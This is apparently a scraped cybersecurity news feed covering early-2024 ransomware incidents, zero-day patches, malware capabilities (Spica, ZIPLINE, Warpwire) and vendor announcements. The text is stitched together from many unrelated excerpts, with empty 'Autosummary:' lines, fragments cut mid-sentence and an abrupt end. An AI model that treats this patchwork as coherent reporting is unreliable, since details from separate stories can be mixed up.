NIST 800-53a Rev 5 Moderate/Low, NIST 800-171, PCI 4.0, Australian Signal Directorate’s Essential Eight, UK NCSC Cyber Essentials v.2.2, CMMC 2.0, HIPAA, NERC-CIP, COBIT 5, SWIFT are among the standards that can map to the CIS Controls. While the CIS doesn’t recommend any particular order to implementing the controls, I would recommend starting with controls 1-3, which determine your hardware, software, and most importantly, your sensitive data inventories.The implementation team(s) need to a) determine what data is needed to implement a particular control, b) find the unit within the organization that has control access to this data, and c) get this information from these units. "Whether we’d like to admit it to ourselves or not, all humans harbor subconscious biases that powerfully influence our behavior. One of these is the omission bias, which has interesting ramifications in the world of cyber security, specifically vulnerability management. In this article, we discuss omission bias in vulnerability management, particularly vulnerability remediation, and how IT operators can overcome it with today’s new management platforms. Vulnerability management Omission bias is the human tendency to assume … More
The post The effect of omission bias on vulnerability management appeared first on Help Net Security.
"Autosummary:
In this article, we discuss omission bias in vulnerability management, particularly vulnerability remediation, and how IT operators can overcome it with today’s new management platforms.A cyber-attack resulting from a specific exposed vulnerability is possible but not guaranteed, and certainly not an immediate concern, but an applied patch that causes a serious disruption is a personal memory many IT professionals can recall vividly, and when it happens, the consequences couldn’t be more immediate. "Security BSides Security BSides offers attendees an opportunity to engage and present their ideas actively. Characterized by its intensity, these events are filled with discussions, demonstrations, and interactive participation. BSides are happening all over the USA. To find an event near you, visit their website. AI for Automotive Cybersecurity USA 19 – 21 March, 2024 | Ann Arbor This event features industry professionals from automotive cybersecurity, artificial intelligence, machine learning, quantum computing, R&D, LLM, and … More
The post 10 USA cybersecurity conferences you should visit in 2024 appeared first on Help Net Security.
"Autosummary:
9 – 12 April, 2024 | Las Vegas At ISC West, you will have the chance to network and connect with thousands of security and public safety professionals, learn from the SIA Education@ISC program, plus explore the latest technologies in cybersecurity, access control, alarms and monitoring, and video surveillance while discovering emerging trends in connected IoT, smart home, and more. "Autosummary:
"Autosummary:
"Autosummary:
More highlights in this month"s preview update This Windows 11 optional release comes with additional fixes and improvements, some of the more significant ones listed below: This update addresses an issue that causes your device to stop responding. "Autosummary:
This issue is fixed in tvOS 17.3, iOS 17.3 and iPadOS 17.3, macOS Sonoma 14.3, iOS 16.7.5 and iPadOS 16.7.5, Safari 17.3, macOS "Proof-of-concept (PoC) exploit code for a critical vulnerability (CVE-2024-0204) in Fortra’s GoAnywhere MFT solution has been made public, sparking fears that attackers may soon take advantage of it. Fortra’s GoAnywhere MFT is a web-based managed file transfer solution widely used by organizations of all sizes. In early 2023, the Cl0P ransomware gang exploited a zero-day vulnerability (CVE-2023-0669) in the same solution to exfiltrate data of 130+ victim organizations, and followed up with threats to publish … More
The post PoC exploit for easily exploitable Fortra GoAnywhere MFT vulnerability released (CVE-2024-0204) appeared first on Help Net Security.
"Autosummary:
In early 2023, the Cl0P ransomware gang exploited a zero-day vulnerability (CVE-2023-0669) in the same solution to exfiltrate data of 130+ victim organizations, and followed up with threats to publish it if they didn’t get paid not to. "Stellar Cyber announced a new partnership with Proofpoint, a cybersecurity and compliance company. Through this alliance, Proofpoint and Stellar Cyber customers benefit from an out-of-the-box integration enabling swift email investigations and real-time response actions to email-driven attacks. Proofpoint Targeted Attack Protection monitors emails to identify suspicious emails and potentially malicious attachments and URLs. Once identified, the findings are shared with Stellar Cyber automatically. Stellar Cyber’s Open XDR platform ingests, normalizes, and analyzes Proofpoint findings and … More
The post Stellar Cyber partners with Proofpoint to speed detection of email-driven cyberattacks appeared first on Help Net Security.
"Autosummary:
"Autosummary:
BianLian has been an active and prevalent threat group since September 2022, predominantly singling out healthcare, manufacturing, professional, and legal services sectors in the U.S., the U.K., Canada, India, Australia, Brazil, Egypt, France, Germany, and Spain. "Autosummary:
Akira ransomware attack on Tietoevry disrupted the services of many Swedish organizations Pierluigi Paganini January 24, 2024 January 24, 2024 A ransomware attack against the Finnish IT services provider Tietoevry disrupted the services of some Swedish government agencies and shops. The Akira ransomware has been active since March 2023, the threat actors behind the malware claim to have already hacked multiple organizations in multiple industries, including education, finance, and real estate. "Autosummary:
"Threat actors, including ransomware actors, are already using AI to increase the efficiency and effectiveness of aspects of cyber operations, such as reconnaissance, phishing and coding," warns the NCSC in a separate threat assessment. "Autosummary:
EquiLend was founded in 2001 by a consortium of ten global banks and broker-dealers, including Bank of America Merrill Lynch, BlackRock, Credit Suisse, Goldman Sachs, JP Morgan, Morgan Stanley, National Bank of Canada, Northern Trust, State Street, and UBS. "Autosummary:
Experts released PoC exploit for Fortra GoAnywhere MFT flaw CVE-2024-0204 Pierluigi Paganini January 24, 2024 January 24, 2024 Researchers released PoC exploit code for a recently disclosed critical authentication bypass flaw in Fortra’s GoAnywhere MFT (Managed File Transfer). In February, 2023, the Clop ransomware group claimed to have stolen sensitive data from over 130 organizations by exploiting another zero-day vulnerability (CVE-2023-0669) in Fortra’s GoAnywhere Managed File Transfer secure file transfer tool. "Autosummary:
"Based on our investigation, we now believe that the threat actor accessed and exfiltrated data beginning in May 2023 from a small percentage of HPE mailboxes belonging to individuals in our cybersecurity, go-to-market, business segments, and other functions," reads the SEC filing. "Autosummary:
The Threat Landscape The top gangs that targeted the education sector between January 2023 and December 2023 include LockBit (60), Vice Society/Rhysida (44), CL0P (22), Medusa (17), and Akira (15).The data also shows that, while ransomware attacks against education are a global phenomenon, the US (with 80% of known attacks) and the UK (with 12%) were hit the most frequently attacked countries between January 2023 and December 2023. "Autosummary:
"In this Help Net Security video, Adam Marrè, CISO at Arctic Wolf, explains how state and local governments must focus on cybersecurity as the 2024 election approaches in the United States. State and local IT and cybersecurity teams usually have few staff members and are overwhelmed with daily tasks. This workload becomes even heavier during election years with extra responsibilities. The recent Arctic Wolf 2024 Election Security Survey found that: Nearly half of respondents expect … More
The post Top cybersecurity concerns for the upcoming elections appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"No company is immune to cyberattacks, but when the inevitable happens, too many companies still try to maintain a wall of silence. In fact, over half of security professionals admit their organizations maintain a culture of security through obscurity, with over one-third admitting they are completely secretive about their cybersecurity activities. While many organizations may fear reputational or monetary damage from proactively sharing findings from vulnerabilities and incidents, I’ve found the contrary to be true: … More
The post Why cyberattacks mustn’t be kept secret appeared first on Help Net Security.
"Autosummary:
The benefits of cyber transparency For individual organizations, transparency and accountability can be a significant differentiator that dictates conversations with customers, the C-Suite, the media, and other key stakeholders.Doing so builds a culture focused on openness, collaboration, and growth that strengthens the people, processes, and technology used to build more robust cybersecurity defenses overall.For maximum effectiveness, there are several best practices to keep in mind: Refrain from finger-pointing When vulnerabilities are discovered, many organizations quickly start looking for someone to blame. "Autosummary:
“Analysis of the core dump of “vmdird” by both Mandiant and VMware Product Security showed that the process crashing is closely aligned with the exploitation of CVE-2023-34048 , the out-of-bounds write vCenter vulnerability in the implementation of the DCE/RPC protocol patched in October 2023, which enables unauthenticated remote command execution on vulnerable systems.” "Autosummary:
The leaked data included names, email addresses, phone numbers, physical addresses, passport numbers, health claims information, and health provider details. "Autosummary:
To date, there is no evidence that the threat actor had any access to customer environments, production systems, source code, or AI systems, but the investigation is still ongoing. "Apple has fixed an actively exploited zero-day vulnerability (CVE-2024-23222) that affects Macs, iPhones, iPads and AppleTVs. About CVE-2024-23222 CVE-2024-23222 is a type confusion issue that affects WebKit – Apple’s browser engine used in the Safari web browser and all iOS and iPadOS web browsers. “Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited,” Apple noted in the software release notes. … More
The post Apple fixes actively exploited WebKit zero-day (CVE-2024-23222) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
LoanDepot data breach impacted roughly 16.6 individuals Pierluigi Paganini January 23, 2024 January 23, 2024 Financial services company LoanDepot disclosed a data breach that impacted roughly 16.6 million individuals. "Autosummary:
"Autosummary:
" VexTrio, which is believed to be have been active since at least 2017, has been attributed to malicious campaigns that use domains generated by a dictionary domain generation algorithm (DDGA) to propagate scams, riskware, spyware, adware, potentially unwanted programs (PUPs), and pornographic content. "Autosummary:
As you might recall, more than 9 million records of Australians, including names, dates of birth, Medicare numbers and sensitive information were stolen in the 2022 attack, and the majority published on the dark web. "Autosummary:
"Autosummary:
" To add a passkey, you have to log into your account, click "Your account" in the navigation bar, go to "Settings and privacy," then click "Security and Account Access," then "Security. "Autosummary:
By using BYOVD attacks, aka exploiting flaws in the loaded driver, the malware gains the privileges to terminate 991 processes from a hardcoded list, many of which correspond to antivirus products, security tools, analysis tools, and system utilities. "Autosummary:
The list of victims who came forward after being breached and extorted by Clop includes but is not limited to healthcare giant Community Health Systems (CHS), Consumer goods giant Procter & Gamble, cybersecurity firm Rubrik, Hitachi Energy, fintech platform Hatch Bank, luxury brand retailer Saks Fifth Avenue, and the City of Toronto, Canada. "Autosummary:
U.S. Water and Wastewater Systems (WWS) Sector facilities have also been breached multiple times by several threat groups deploying Ghost, ZuCaNo, and Makop ransomware in recent years, Other breaches of water facilities have happened over the past two decades, including a South Houston wastewater treatment plant in 2011, a water company with outdated software and hardware equipment in 2016, the Southern California Camrosa Water District in August 2020, and a Pennsylvania water system in May 2021. "Autosummary:
The leaked data included names, email addresses, phone numbers, physical addresses, passport numbers, health claims information, and health provider details. "Autosummary:
It will all sound convincing, complete with an air of urgency, and with what seems like auditory multi-factor authentication, but you can still get scammed, even if you “personally heard from an official”. Now, in the US at least, there’s a contest to break the fake, and hopefully find ways to provide defensive systems with ways to thwart a related attack. "Autosummary:
"Autosummary:
The guidance issued by the FBI, CISA, and EPA focuses on the four stages of incident response: Preparation: WWS Sector organizations should have an incident response plan in place, implement available services and resources to raise their cyber baseline, and engage with the WWS Sector cyber community. "In an era where cybercrime poses a pervasive threat to individuals, corporations, and governments worldwide, Resecurity and Cybercrime Atlas have forged a partnership aimed at disrupting the global cybercriminal ecosystem. The Cybercrime Atlas is hosted by the World Economic Forum’s Centre for Cybersecurity and uses open-source research to create new insights into the cybercriminal ecosystem. The Cybercrime Atlas community is made up of organizations who have a key role in identifying and disrupting cybercriminal operations. … More
The post Resecurity and Cybercrime Atlas join forces to disrupt cybercriminal operations appeared first on Help Net Security.
"Autosummary:
This collaborative effort aims to establish an action-oriented, global repository of cybercriminal intelligence, fostering cooperation between cybercrime investigators, law enforcement agencies, and businesses on a national and international scale. "Finnish IT software and service company Tietoevry has suffered a ransomware attack that affected several customers of one of its datacenters in Sweden. The attack The ransomware attack took place during the night of January 19-20. “The attack was limited to one part of one of our Swedish datacenters, impacting Tietoevry’s services to some of our customers in Sweden,” the company noted. “Tietoevry immediately isolated the affected platform, and the ransomware attack has not affected … More
The post Tietoevry ransomware attack halts Swedish organizations appeared first on Help Net Security.
"Autosummary:
"Autosummary:
The Godzilla Web Shell supports multiple functionalities including: Viewing network details Conducting port scans Executing Mimikatz commands Running Meterpreter commands Executing shell commands Remotely managing SQL databases Injecting shellcode into processes Handling file management tasks The report includes Indicators of Compromise (IoCs). "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
The organisation’s domain name is extracted, based on the victim’s e-mail address, from the string following the @ symbol (in this case from “[email protected]” the domain name obtained is example.com); with a JS function they extract the e-mail domain name and invoke the http://logo.clearbit[.]com/[domain name] service to derive the company logo. “My slice”, the details of the Italian campaign Last year, a highly targeted phishing campaign that I renamed “My slice” (derived from the name of a variable in the javascript code of the landing page) targeted e-mail account holders of Italian organisations. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Key elements for a successful cyber risk management strategy In this Help Net Security interview, Yoav Nathaniel, CEO at Silk Security, discusses the evolution of cyber risk management strategies and practices, uncovering common mistakes and highlighting key components for successful risk resolution. CISOs’ crucial role in aligning security goals with enterprise expectations In this Help Net Security interview, Chris Mixter, … More
The post Week in review: 10 cybersecurity frameworks you need to know, exploited Chrome zero-day fixed appeared first on Help Net Security.
"Autosummary:
Ransomware negotiation: When cybersecurity meets crisis management In this Help Net Security interview, Tim Morris, Chief Security Advisor at Tanium, discusses ransomware negotiation, how it typically unfolds, and how organizations should have a playbook that clearly outlines what to do, when to do it, who is notified, who will inform the board, who will talk to the press, etc. Ivanti EPMM and MobileIron Core vulnerability is actively exploited, CISA confirms (CVE-2023-35082) A previously patched critical vulnerability (CVE-2023-35082) affecting Ivanti Endpoint Manager Mobile (EPMM) and MobileIron Core is being actively exploited, the Cybersecurity and Infrastructure Security Agency (CISA) has confirmed by adding the vulnerability to its Known Exploited Vulnerabilities Catalog (KEV). "Autosummary:
Message on Filmstaden"s website warning of the IT outage Source: BleepingComputer Other companies impacted by the attack include discount retail chain Rusta, raw building materials provider Moelven, and farming supplier Grangnården, which was forced to close its stores while IT services are restored. Impacted universities and colleges in the country include the Karolinska Institutet, SLU, University West, Stockholm University, Lunds Universitet, and Malmö University. "Autosummary:
Facebook "I"m gonna miss him so much" phishing posts Source: BleepingComputer When BleepingComputer tested the links in the phishing posts, they brought us to different sites depending on the type of device you are using. "Autosummary:
"Autosummary:
The company detected the attack on January 12th, with Microsoft initiating its response to investigate, disrupt, and mitigate the breach. "Autosummary:
"Autosummary:
"Their strategy involves caching a seemingly benign version of the attack vector and subsequently altering it to deliver a malicious payload," Trellix said, stating such attacks have disproportionately targeted financial services, manufacturing, retail, and insurance verticals in Italy, the U.S., France, Australia, and India. "Autosummary:
"Autosummary:
"Autosummary:
Analysis of 3AM ransomware intrusion set source: Intrinsec A closer analysis revealed that six of the 27 servers shared the same port, protocol, Apache product with the same version, autonomous system (AS16125), organization, and the text “llc” indicating a ‘limited liability company’. The syndicate split into multiple cells and the ransomware brand dissolved but many of its members and affiliates partnered with other operations, contributing with experienced individuals for all stages of an attack, from target analysis and initial access, to negotiations, infrastructure, developers, and operators. "Autosummary:
According to the original report by Heise, the programmer, operating as a freelance IT service provider, was initially tasked by a client to resolve excessive log generation issues with the merchandise management software they were using. "Autosummary:
The trojanized version of the library is designed to decrypt the DAT file ("msedge.dat") and launch another DLL called "msedgedat.dll," which, in turn, establishes connections with an actor-controlled domain named "kdark1[.]com" to retrieve a ZIP archive. "Autosummary:
"Autosummary:
On January, 16, 2023, the University K-State announced it was experiencing a disruption to certain network systems, including VPN, K-State Today emails, and videos on Canvas, or Mediasite. "Autosummary:
UNC3886 attack chain (Mandiant) "While publicly reported and patched in October 2023, Mandiant has observed these crashes across multiple UNC3886 cases between late 2021 and early 2022, leaving a window of roughly a year and a half that this attacker had access to this vulnerability," Mandiant said on Friday. "Autosummary:
"Autosummary:
Many ransomware groups (like Royal, Black Basta, LockBit, and, more recently, RTM Locker, Qilin, ESXiArgs, Monti, and Akira) are now known for directly targeting the victims" VMware ESXi servers to steal and encrypt their files and demand huge ransoms. "Autosummary:
The following supported versions of NetScaler ADC and NetScaler Gateway are affected by the vulnerabilities: NetScaler ADC and NetScaler Gateway 14.1 before 14.1-12.35 NetScaler ADC and NetScaler Gateway 13.1 before 13.1-51.15 NetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.21 NetScaler ADC 13.1-FIPS before 13.1-37.176 NetScaler ADC 12.1-FIPS before 12.1-55.302 NetScaler ADC 12.1-NDcPP before 12.1-55.302 Note: NetScaler ADC and NetScaler Gateway version 12.1 is now End Of Life (EOL) and is vulnerable. "Autosummary:
VF Corp"s family of brands include: Altra Dickies Eastpak icebreaker JanSport Kipling Napapijri Smartwool Supreme The North Face Timberland Vans The good news is that VF Corp does not retain consumers" payment card details, bank account information, or social security numbers - so you probably don"t have to worry that that particularly sensitive information has fallen into the hands of hackers. "Autosummary:
Top targeted companies: Stanford University, Volt, CoinBase According to data from Ransomlooker, the top 10 industries targeted by ransomware groups in 2023 were IT services and IT consulting, construction, manufacturing and industrial, retail, hospitals and health care, insurance, law practice, real estate, software development, and machinery manufacturing. "Autosummary:
"Autosummary:
Starting last weekend, many Payoneer users in Argentina, whose accounts were protected by two-factor authentication (2FA), reported suddenly losing access to their accounts or simply logging in to empty wallets, losing "years of work" worth in money ranging from $5,000 to $60,000. "Autosummary:
Victims discovered so far include government and military departments worldwide, national telecom companies, defense contractors, technology companies, banking, finance, and accounting organizations, worldwide consulting outfits, and aerospace, aviation, and engineering firms. "A previously patched critical vulnerability (CVE-2023-35082) affecting Ivanti Endpoint Manager Mobile (EPMM) and MobileIron Core is being actively exploited, the Cybersecurity and Infrastructure Security Agency (CISA) has confirmed by adding the vulnerability to its Known Exploited Vulnerabilities Catalog (KEV). It is not known whether the vulnerability is being exploited by ransomware groups, and CISA does not publish specific information about attacks in which the vulnerabilities in the KEV catalog are exploited. But it does seem … More
The post Ivanti EPMM and MobileIron Core vulnerability is actively exploited, CISA confirms (CVE-2023-35082) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
China-linked APT UNC3886 exploits VMware zero-day since 2021 Pierluigi Paganini January 19, 2024 January 19, 2024 China-linked group UNC3886 has been exploiting vCenter Server zero-day vulnerability CVE-2023-34048 since at least late 2021. "Autosummary:
“However, VF does not collect or retain in its IT systems any consumer social security numbers, bank account information or payment card information as part of its direct-to-consumer practices, and, while the investigation remains ongoing, VF has not detected any evidence to date that any consumer passwords were acquired by the threat actor.” "The widespread adoption of artificial intelligence (AI), particularly generative AI (GenAI), has revolutionized organizational landscapes and transformed both the cyber threat landscape and cybersecurity. AI as a powerful cybersecurity tool As organizations handle increasing amounts of data daily, AI offers advanced capabilities that would be harder to achieve with traditional methods. According to the “best practices” report recently published by Spain’s National Cryptology Centre (NCC), when applied to cybersecurity, AI can: Advance threat detection and … More
The post The power of AI in cybersecurity appeared first on Help Net Security.
"Autosummary:
"More than 10% of enterprise employees access at least one generative AI application every month, compared to just 2% a year ago, according to Netskope. In 2023, ChatGPT was the most popular generative AI application, accounting for 7% of enterprise usage. While Netskope expects the total number of users accessing AI apps in the enterprise to continue rising moderately next year, there is an emerging population of power users who are steadily growing their use … More
The post Adversaries exploit trends, target popular GenAI apps appeared first on Help Net Security.
"Autosummary:
“With growing AI app usage, employees are more likely to expose sensitive data like credentials, personal information, or intellectual property,” said Ray Canzanese, Threat Research Director, Netskope Threat Labs. "In this Help Net Security interview, Tim Morris, Chief Security Advisor at Tanium, discusses ransomware negotiation, how it typically unfolds, and how organizations should have a playbook that clearly outlines what to do, when to do it, who is notified, who will inform the board, who will talk to the press, etc. Additionally, he discusses ransomware gangs, the role of cyber insurance, and how governments and regulatory bodies are responding to the ransomware threat In … More
The post Ransomware negotiation: When cybersecurity meets crisis management appeared first on Help Net Security.
"Autosummary:
In this Help Net Security interview, Tim Morris, Chief Security Advisor at Tanium, discusses ransomware negotiation, how it typically unfolds, and how organizations should have a playbook that clearly outlines what to do, when to do it, who is notified, who will inform the board, who will talk to the press, etc. Additionally, he discusses ransomware gangs, the role of cyber insurance, and how governments and regulatory bodies are responding to the ransomware threat In light of the increasing sophistication of ransomware attacks, can you discuss the dynamics of negotiating with ransomware gangs? "Autosummary:
After the update, the version should be 120.0.6099.224, or later Technical details Google never gives out a lot of information about vulnerabilities, for obvious reasons. The following toggle settings are available: Toggle Off (Default): Feature is turned off Toggle On – Balanced (Recommended): Microsoft Edge will apply added security protections when users visit unfamiliar sites but bypass those protections for commonly visited sites. "Swimlane announced its new Turbine innovations, Canvas and Hero AI. This transformative combination empowers security teams to build automation in seconds with limitless integration possibilities, leading to dramatic time and resource savings. SecOps teams are drowning in a sea of alerts and evolving threats while facing a chronic shortage of qualified staff. This critical gap leaves organizations dangerously exposed as adversaries evolve their tactics and accelerate their attacks. Recognizing this urgent need, Swimlane has revolutionized … More
The post Swimlane enhances Turbine platform to alleviate the pressure on SecOps teams appeared first on Help Net Security.
"Autosummary:
Text-to-Code ChatBot: Low-code solutions allow analysts to build use cases in a no-code fashion, but for power users and real-time security operations, a snippet of code might be urgently needed. Everyone needs a hero: Bringing together humans, automation, and AI to elevate security operations Hero AI, Swimlane’s collection of AI-enabled innovations, enhances the automation solutions available for the Swimlane Turbine platform.Recognizing this urgent need, Swimlane has revolutionized its Turbine low-code automation platform with advancements that strengthen security teams by connecting them, their telemetry, and technology through a human-centric AI and automation building experience. "Autosummary:
Screenshot of the information stealer logs can contain, including cookies, passwords, and other sensitive information Source: Flare Tier 3 Leaked Credentials This tier of leaks is also from stealer logs, but pose extreme risk to the organization. Screenshot of combolist Source: Flare These credentials usually come from previous known breaches, or stealer logs, or sometimes totally made up; the original source is never totally clear, but the sheer amount of credentials one can acquire through combolists combined with frequent password reuse on the user’s part still makes them a considerable attack vector. Tier 1 Leaked Credentials Tier 1 leaked credentials result from a third-party application/service breaches, and all of the users of that service having their passwords compromised and distributed in a data dump on the dark web. "Autosummary:
PDF lure document (Google TAG) The Spica Rust-based malware uses JSON over websockets to communicate with its command-and-control (C2) server, and it helps to run arbitrary shell commands, steal Chrome, Firefox, Opera, and Edge cookies, upload and download files, and exfiltrate documents. "Users exposing poorly secured PostgreSQL and MySQL servers online are in danger of getting their databases wiped by a ransomware bot, Border0 researchers are warning. The attackers asks for a small sum to return / not publish the data, but those who pay will not get their data back, as the bot takes only a small amount of it before wiping it all. How the ransomware bot operates Spurred by a recent tweet in which … More
The post Poorly secured PostgreSQL, MySQL servers targeted by ransomware bot appeared first on Help Net Security.
"Autosummary:
Created a new database named readme_to_recover, which contains the ransom note The ransom note (Source: Border0) “If you decide not to retrieve the data, we may sell your database in online markets, disclose it to your users and request payment from them, disclose it in online breach forums, or delete it. "ESET launched ESET MDR, an innovative solution aimed at addressing the evolving cybersecurity challenges faced by SMBs. This launch marks a significant stride in expanding ESET’s security services portfolio with another MDR solution. In a rapidly changing threat landscape, organizations seek MDR service providers to enhance their security postures, reduce false positives and fortify their threat detection, investigation, and response capabilities. The ESET MDR service for SMBs is designed specifically to meet these needs and … More
The post ESET launches MDR service to improve cybersecurity for SMBs appeared first on Help Net Security.
"Autosummary:
In a rapidly changing threat landscape, organizations seek MDR service providers to enhance their security postures, reduce false positives and fortify their threat detection, investigation, and response capabilities. "Autosummary:
COLDRIVER, also known by the names Blue Callisto, BlueCharlie (or TAG-53), Calisto (alternately spelled Callisto), Gossamer Bear, Star Blizzard (formerly SEABORGIUM), TA446, and UNC4057, is known to be active since 2019, targeting a wide range of sectors. "Autosummary:
Spica supports multiple capabilities, such as: Executing arbitrary shell commands Stealing cookies from Chrome, Firefox, Opera and Edge Uploading and downloading files Perusing the filesystem by listing the contents of it Enumerating documents and exfiltrating them in an archive There is also a command called “telegram,” but the functionality of this command is unclear The malware maintains persistence via an obfuscated PowerShell command that creates a scheduled task named CalendarChecker. "Autosummary:
Multiple other Ivanti zero-days (i.e., CVE-2021-22893, CVE-2023-35078, CVE-2023-35081, CVE-2023-38035) have been exploited in recent years to breach dozens of government, defense, and financial organizations across the United States and Europe, several Norwegian government organizations, as well as in targeted attacks. "Autosummary:
Impacted systems were taken offline upon detection of the attack, resulting in the unavailability of VPN, emails, Canvas and Mediasite videos, printing, shared drives, and mailing list management services (Listservs). "Autosummary:
Every additional security tool a company buys requires its own set of configurations, updates, and management protocols, ultimately translating to longer response times, inefficient workflows, and an inability to have a unified view of the threat landscape.That’s good, but for $5, you can upgrade to a complete meal—burger, fries, drink, maybe even a vintage Furby. "Autosummary:
"Autosummary:
This week Citrix warned customers to install security updates to address two actively exploited zero-day vulnerabilities, tracked as CVE-2023-6548 and CVE-2023-6549, impacting Netscaler ADC and Gateway appliances.CISA adds Chrome and Citrix NetScaler to its Known Exploited Vulnerabilities catalog Pierluigi Paganini January 18, 2024 January 18, 2024 U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Chrome and Citrix flaws to its Known Exploited Vulnerabilities catalog. "Autosummary:
In the second endpoint seen by Huntress, which has been running since 2018, there had been no activity in the logs for the past three months, indicating that it was less frequently monitored, possibly making it more attractive for the attackers. "Autosummary:
What the future holds for voice cloning Unfortunately, voice cloning technology is already worryingly convincing, as also our recent experiment proves. Instead, it’s a terrifying example of the lengths that scammers can now go to in order extort money from their victims, co-opting new technology for nefarious purposes. If you fall for the scam, you will most likely be asked to pay in non-traceable way, like cryptocurrency. In fact, beside disinformation, deepfake technology is also being used for business email compromise (as tested by our own Jake Moore) and sextortion We are only at the start of a long journey. "Autosummary:
"Autosummary:
"Employees play a significant role in safeguarding organizational assets. With a constantly evolving threat landscape, cybersecurity awareness training is an essential component in creating a good security culture. Why cybersecurity awareness training? 81% of organizations were hit by malware, phishing, and password attacks in 2022, mostly targeting users. But even though employees go through cybersecurity awareness training, half of organizationd’ leaders believe their employees still lack cybersecurity knowledge. This might be due to ineffective and … More
The post The right strategy for effective cybersecurity awareness appeared first on Help Net Security.
"Autosummary:
The European Union Agency for Cybersecurity (ENISA) has outlined the following essential objectives of an organization’s cyber awareness program: Raising cybersecurity awareness Promoting cybersecurity education and culture Being prepared for incidents Boosting comprehension of cybersecurity threats and landscape Improving cybersecurity culture and hygiene Testing policies and procedures Ensuring effective cybersecurity awareness training First of all, employees must be educated about the various threats they may encounter when in their work environment. "Autosummary:
"Autosummary:
Use the Browse button to point to the unzipped XML file button to point to the unzipped XML file Click the Import Button Importing this XML into any one node of a Cluster is enough. "Autosummary:
In earlier days of scams like these, success depended a great deal on the criminal’s skills at social engineering, but rapid advancements in Artificial Intelligence (AI) mean scammers can now easily and convincingly fake the “voice” of the relative that is the supposed victim of the accident. "Industrial Defender announced a strategic technology partnership with Dragos. The collaboration between these leaders in OT cybersecurity integrates their respective platform capabilities, representing a major move towards combining their leading strengths to enhance outcomes for OT operators. The partnership is centered around the shared goal of enhancing the security and resilience of critical infrastructure and manufacturing facilities. The intent of this collaboration is to bring together the unique strengths of both Industrial Defender and Dragos. … More
The post Industrial Defender collaborates with Dragos to enhance outcomes for OT operators appeared first on Help Net Security.
"Autosummary:
“Industrial Defender’s longstanding expertise in ICS/OT security is well-recognized in operational environments,” said Matt Cowell, Global VP of Business Development, Dragos. "In the new stable release of the Chrome browser, Google has fixed three security vulnerabilities affecting the V8 engine, including one zero-day (CVE-2024-0519) with an existing exploit. About CVE-2024-0519 V8 is an open-source JavaScript and WebAssembly engine developed by the Chromium Project for Chromium and Google Chrome web browsers. CVE-2024-0519 is an (obviously exploitable) out of bounds memory access that, as noted by NIST, “allowed a remote attacker to potentially exploit heap corruption via a … More
The post Google fixes actively exploited Chrome zero-day (CVE-2024-0519) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Below is the list of Netscaler product versions: NetScaler ADC and NetScaler Gateway 14.1-12.35 and later releases NetScaler ADC and NetScaler Gateway 13.1-51.15 and later releases of 13.1 NetScaler ADC and NetScaler Gateway 13.0-92.21 and later releases of 13.0 NetScaler ADC 13.1-FIPS 13.1-37.176 and later releases of 13.1-FIPS NetScaler ADC 12.1-FIPS 12.1-55.302 and later releases of 12.1-FIPS NetScaler ADC 12.1-NDcPP 12.1-55.302 and later releases of 12.1-NDcPP Citrix vulnerabilities were already exploited in the past in large-scale attacks. "Autosummary:
"Autosummary:
By providing a platform for security information and event management, log analysis, intrusion detection, vulnerability detection, active response, file integrity monitoring, compliance monitoring, and more. For example, an anti-virus solution for endpoint security, web application firewall for application security, network firewall for network security, and SIEM solution for monitoring and compliance. Leveraging open source tools and solutions to build a cybersecurity architecture offers organizations several advantages, such as cost-effectiveness, flexibility, community support, and transparency.Some key areas to consider when implementing a security architecture include: Endpoint protection Cloud security Network security Application security Identity and access management Monitoring and compliance Vulnerability management Physical security.Wazuh provides out-of-the-box support for compliance frameworks like PCI DSS, HIPAA, GDPR, NIST SP 800-53, and TSC.Wazuh provides out-of-the-box support for compliance frameworks like PCI DSS, HIPAA, GDPR, NIST SP 800-53, and TSC. "Autosummary:
“On December 26, 2023, GitHub received a report through our Bug Bounty Program demonstrating a vulnerability which, if exploited, allowed access to credentials within a production container.” reads the announcement. "Autosummary:
"Autosummary:
" Between March 2021 and June 2022, APT35 backdoored at least 34 companies with previously unknown Sponsor malware in a campaign that targeted government and healthcare organizations, as well as firms in the financial services, engineering, manufacturing, technology, law, telecommunications, and other industry sectors. "Autosummary:
Bigpanzi infects the devices via firmware updates or backdoored apps the users are tricked into installing themselves, as highlighted in a September 2023 report by Dr. Web. Malicious apps carrying malware payloads Source: Xlabs The cybercriminals monetize these infections by turning the devices into nodes for illegal media streaming platforms, traffic proxying networks, distributed denial of service (DDoS) swarms, and OTT content provision. "Autosummary:
The list of tools used in the attacks includes: Zipline Passive Backdoor : custom malware that can intercept network traffic, supports upload/download operations, creates reverse shells, proxy servers, server tunneling : custom malware that can intercept network traffic, supports upload/download operations, creates reverse shells, proxy servers, server tunneling Thinspool Dropper : custom shell script dropper that writes the Lightwire web shell onto Ivanti CS, securing persistence : custom shell script dropper that writes the Lightwire web shell onto Ivanti CS, securing persistence Wirefire web shell : custom Python-based web shell supporting unauthenticated arbitrary command execution and payload dropping : custom Python-based web shell supporting unauthenticated arbitrary command execution and payload dropping Lightwire web shell : custom Perl web shell embedded in a legitimate file, enabling arbitrary command execution : custom Perl web shell embedded in a legitimate file, enabling arbitrary command execution Warpwire harvester : custom JavaScript-based tool for harvesting credentials at login, sending them to a command and control (C2) server : custom JavaScript-based tool for harvesting credentials at login, sending them to a command and control (C2) server PySoxy tunneler : facilitates network traffic tunneling for stealthiness : facilitates network traffic tunneling for stealthiness BusyBox : multi-call binary combining many Unix utilities used in various system tasks : multi-call binary combining many Unix utilities used in various system tasks Thinspool utility (sessionserver.pl): used to remount the filesystem as "read/write" to enable malware deployment The most notable is ZIPLINE, a passive backdoor that intercepts incoming network traffic and provides file transfer, reverse shell, tunneling, and proxying capabilities. "As cyber threats grow more sophisticated, understanding and implementing robust cybersecurity frameworks is crucial for organizations of all sizes. This article lists the most essential cybersecurity frameworks developed to guide businesses and governments in safeguarding their digital assets. From the comprehensive guidelines of the NIST Cybersecurity Framework to the 